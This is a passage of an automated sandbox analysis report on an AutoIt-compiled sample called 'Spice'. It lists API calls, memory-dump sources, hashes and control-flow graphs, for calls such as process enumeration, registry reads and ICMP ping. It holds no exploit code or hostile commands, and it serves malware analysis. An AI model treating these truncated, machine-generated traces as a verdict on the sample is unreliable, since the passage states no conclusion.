                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00ED419B
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 00ED4245
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3243318325-0
                                                                                                                                                                                                                                      • Opcode ID: 836bd358b460a0a97ad9dae8d7223b571adfe0442a93dcb7be3d28c7c828b9a5
                                                                                                                                                                                                                                      • Instruction ID: 488f99078f4069f42c3833bd305f8c6fbdd64ce4dfe939c213db223439ecdbe9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 836bd358b460a0a97ad9dae8d7223b571adfe0442a93dcb7be3d28c7c828b9a5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF3181711083419FD304EF50E885AAEBBE8FFA5354F10152EF589A22E1EB71994ACB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E83740: CharUpperBuffW.USER32(?,00F371DC,00000000,?,00000000,00F371DC,?,00E753A5,?,?,?,?), ref: 00E8375D
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00E7B68A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2819905725-0
                                                                                                                                                                                                                                      • Opcode ID: d8b443c8217036bdf39ff26f93701f80cb6611f54c86103b047e0cd770265416
                                                                                                                                                                                                                                      • Instruction ID: 5d32d71330134638909d085f80f75bc7939374eccc62672c2e3cfbb193acdc25
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8b443c8217036bdf39ff26f93701f80cb6611f54c86103b047e0cd770265416
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5A276706083419FC720DF28C481B6BB7E5BF84308F14A96DE89AAB361D771ED45CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00EBFC86), ref: 00ED495A
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ED496B
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ED497B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 48322524-0
                                                                                                                                                                                                                                      • Opcode ID: a1f83a165f71bcf1ff3f872e790d6f45f93f917c6176e3ce1972501fa496a496
                                                                                                                                                                                                                                      • Instruction ID: 2e6a084fd8bebe708e3002fb4448109bf548864c8a6bf6cb0663bc9618e19a3e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1f83a165f71bcf1ff3f872e790d6f45f93f917c6176e3ce1972501fa496a496
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E0DF7191050AABC3106738EC0D9EA776CEF96339F100706F835D22E0EF709944A6D6
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c65a78a2f509c60397ee76b6530a18d160e4689246abfa51b7180c94ed958e26
                                                                                                                                                                                                                                      • Instruction ID: 2ded578841a8b4e96391515d53a0be7ecbcee2b830f95b4a13f052a771e1610e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c65a78a2f509c60397ee76b6530a18d160e4689246abfa51b7180c94ed958e26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF22AD74A00216CFDB24DF68C480AAEB7F0FF45304F14D16AE95ABB352E775A981CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00E7BF57
                                                                                                                                                                                                                                        • Part of subcall function 00E752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E752E6
                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00EB36B5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePeekSleepTimetime
                                                                                                                                                                                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                                                                                                                                                                      • API String ID: 1792118007-922114024
                                                                                                                                                                                                                                      • Opcode ID: 2e4b76caa9675a0c14906494a53b0fbdc08ad81cd45e29c8fd970b9b77d84b77
                                                                                                                                                                                                                                      • Instruction ID: 598a21479ad09c4d8fe83618a0b6bfdf22efe1719abbe7afce32cab7cde5f220
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e4b76caa9675a0c14906494a53b0fbdc08ad81cd45e29c8fd970b9b77d84b77
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BC2AE70608341DFD728DF24C885BABB7E5BF84304F14991DF58AA72A2CB71E945CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E73444
                                                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00E7346E
                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7347F
                                                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00E7349C
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E734AC
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 00E734C2
                                                                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E734D1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                      • Opcode ID: 4e97a45c5eeb6685a4fc629a34722362eb801dc16e4aba2a3241e5d99a1f6046
                                                                                                                                                                                                                                      • Instruction ID: 6b0b7096b70a39457e03e7e248693b55cb046d90df1d89f24bc7b0dc9eb400d6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e97a45c5eeb6685a4fc629a34722362eb801dc16e4aba2a3241e5d99a1f6046
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B33158B184430DAFDB50DFA4EC89BCDBBF1FB09320F10415AE580A62A0DBB94545EF91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E73444
                                                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00E7346E
                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7347F
                                                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00E7349C
                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E734AC
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 00E734C2
                                                                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E734D1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                      • Opcode ID: 69f6ef6d5a383de6c93d1aa16f3d598a0e83b0c7c1f94b349eef76d213774469
                                                                                                                                                                                                                                      • Instruction ID: 732805a0c6b49c3e7db1dec132806ceff62ea8b60eea5fe486eed4666649f25c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69f6ef6d5a383de6c93d1aa16f3d598a0e83b0c7c1f94b349eef76d213774469
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA21E5B190430DAFDB10AFA4EC89B9EBBF5FB08720F10411AF915A62A0DBB55544EF91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E900CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E83094), ref: 00E900ED
                                                                                                                                                                                                                                        • Part of subcall function 00E908C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E8309F), ref: 00E908E3
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E830E2
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EC01BA
                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EC01FB
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00EC0239
                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00EC0292
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                      • API String ID: 2673923337-2727554177
                                                                                                                                                                                                                                      • Opcode ID: b5881c8fc135fe8ccf3bfe619639677a8001cdf31bf46211ca601b5f9662a839
                                                                                                                                                                                                                                      • Instruction ID: 2bfc446ded259d9d963ea5a0ef6ab57dcffbb69506696461c39c6bedcb6c7cdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5881c8fc135fe8ccf3bfe619639677a8001cdf31bf46211ca601b5f9662a839
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC717D715093059EC704EF25E8819ABBBE9FF443A0F40152EF449A32B1EF35D94AEB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E85156
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00E85165
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00E8517C
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00E8518E
                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00E851A0
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E851C6
                                                                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00E8521C
                                                                                                                                                                                                                                        • Part of subcall function 00E73411: GetSysColorBrush.USER32(0000000F), ref: 00E73444
                                                                                                                                                                                                                                        • Part of subcall function 00E73411: RegisterClassExW.USER32(00000030), ref: 00E7346E
                                                                                                                                                                                                                                        • Part of subcall function 00E73411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7347F
                                                                                                                                                                                                                                        • Part of subcall function 00E73411: InitCommonControlsEx.COMCTL32(?), ref: 00E7349C
                                                                                                                                                                                                                                        • Part of subcall function 00E73411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E734AC
                                                                                                                                                                                                                                        • Part of subcall function 00E73411: LoadIconW.USER32(000000A9), ref: 00E734C2
                                                                                                                                                                                                                                        • Part of subcall function 00E73411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E734D1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                      • Opcode ID: dffa103d67ce5a7dba4dd7ebdab5753d4437f9c1b2bfd7ac9b174f2af01126a7
                                                                                                                                                                                                                                      • Instruction ID: 9b7fcf6c0b41f5a0f92094c47a415fc8cebb8b7ea68d64836d0713448ae997d5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dffa103d67ce5a7dba4dd7ebdab5753d4437f9c1b2bfd7ac9b174f2af01126a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33212DB190430DAFEB20AFA4ED09B9E7BB6FB08720F004159F504A62A1D7B69550EF94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 710 ee5e1d-ee5e54 call e74dc0 713 ee5e56-ee5e63 call e7502b 710->713 714 ee5e74-ee5e86 WSAStartup 710->714 713->714 721 ee5e65-ee5e70 call e7502b 713->721 716 ee5e9d-ee5edb call e840cd call e74d37 call e8402a inet_addr gethostbyname 714->716 717 ee5e88-ee5e98 call ec7135 714->717 731 ee5eec-ee5efc call ec7135 716->731 732 ee5edd-ee5eea IcmpCreateFile 716->732 726 ee5ff6-ee5ffe 717->726 721->714 737 ee5fed-ee5ff1 call e81cb6 731->737 732->731 733 ee5f01-ee5f32 call e90fe6 call e8433f 732->733 742 ee5f34-ee5f53 IcmpSendEcho 733->742 743 ee5f55-ee5f69 IcmpSendEcho 733->743 737->726 744 ee5f6d-ee5f6f 742->744 743->744 745 ee5fa2-ee5fa4 744->745 746 ee5f71-ee5f76 744->746 749 ee5fa6-ee5fb2 call ec7135 745->749 747 ee5fba-ee5fcc call e74dc0 746->747 748 ee5f78-ee5f7d 746->748 760 ee5fce-ee5fd0 747->760 761 ee5fd2 747->761 750 ee5f7f-ee5f84 748->750 751 ee5fb4-ee5fb8 748->751 759 ee5fd4-ee5fe8 IcmpCloseHandle WSACleanup call e845ae 749->759 750->745 754 ee5f86-ee5f8b 750->754 751->749 757 ee5f8d-ee5f92 754->757 758 ee5f9a-ee5fa0 754->758 757->751 763 ee5f94-ee5f98 757->763 758->749 759->737 760->759 761->759 763->749
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 00EE5E7E
                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?,?,?), ref: 00EE5EC3
                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00EE5ECF
                                                                                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00EE5EDD
                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5F4D
                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5F63
                                                                                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EE5FD8
                                                                                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 00EE5FDE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                      • Opcode ID: 16e4bb6aba1384d6afee8554b27f899eb706bffc2b806140f53961c25e8edf7d
                                                                                                                                                                                                                                      • Instruction ID: b13967cb5e5451f021d11f49d1d0d39d9e584822474ca246670baef1bc32eb19
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16e4bb6aba1384d6afee8554b27f899eb706bffc2b806140f53961c25e8edf7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C51AE326046459FDB20EF25CC49B2AB7E4EF48718F145529F999AB2A1DB70E900DB42
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 764 e84d83-e84dd1 766 e84e31-e84e33 764->766 767 e84dd3-e84dd6 764->767 766->767 770 e84e35 766->770 768 e84dd8-e84ddf 767->768 769 e84e37 767->769 771 e84ead-e84eb5 PostQuitMessage 768->771 772 e84de5-e84dea 768->772 774 e84e3d-e84e40 769->774 775 ec09c2-ec09f0 call e7c460 call e7c483 769->775 773 e84e1a-e84e22 DefWindowProcW 770->773 782 e84e61-e84e63 771->782 778 e84df0-e84df2 772->778 779 ec0a35-ec0a49 call ed2cce 772->779 781 e84e28-e84e2e 773->781 776 e84e42-e84e43 774->776 777 e84e65-e84e8c SetTimer RegisterWindowMessageW 774->777 811 ec09f5-ec09fc 775->811 783 e84e49-e84e5c KillTimer call e85ac3 call e734e4 776->783 784 ec0965-ec0968 776->784 777->782 785 e84e8e-e84e99 CreatePopupMenu 777->785 786 e84df8-e84dfd 778->786 787 e84eb7-e84ec1 call e85b29 778->787 779->782 804 ec0a4f 779->804 782->781 783->782 790 ec099e-ec09bd MoveWindow 784->790 791 ec096a-ec096c 784->791 785->782 793 ec0a1a-ec0a21 786->793 794 e84e03-e84e08 786->794 806 e84ec6 787->806 790->782 798 ec098d-ec0999 SetFocus 791->798 799 ec096e-ec0971 791->799 793->773 801 ec0a27-ec0a30 call ec8854 793->801 802 e84e9b-e84eab call e85bd7 794->802 803 e84e0e-e84e14 794->803 798->782 799->803 807 ec0977-ec0988 call e7c460 799->807 801->773 802->782 803->773 803->811 804->773 806->782 807->782 811->773 815 ec0a02-ec0a15 call e85ac3 call e859d3 811->815 815->773
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00E84E22
                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001), ref: 00E84E4C
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E84E6F
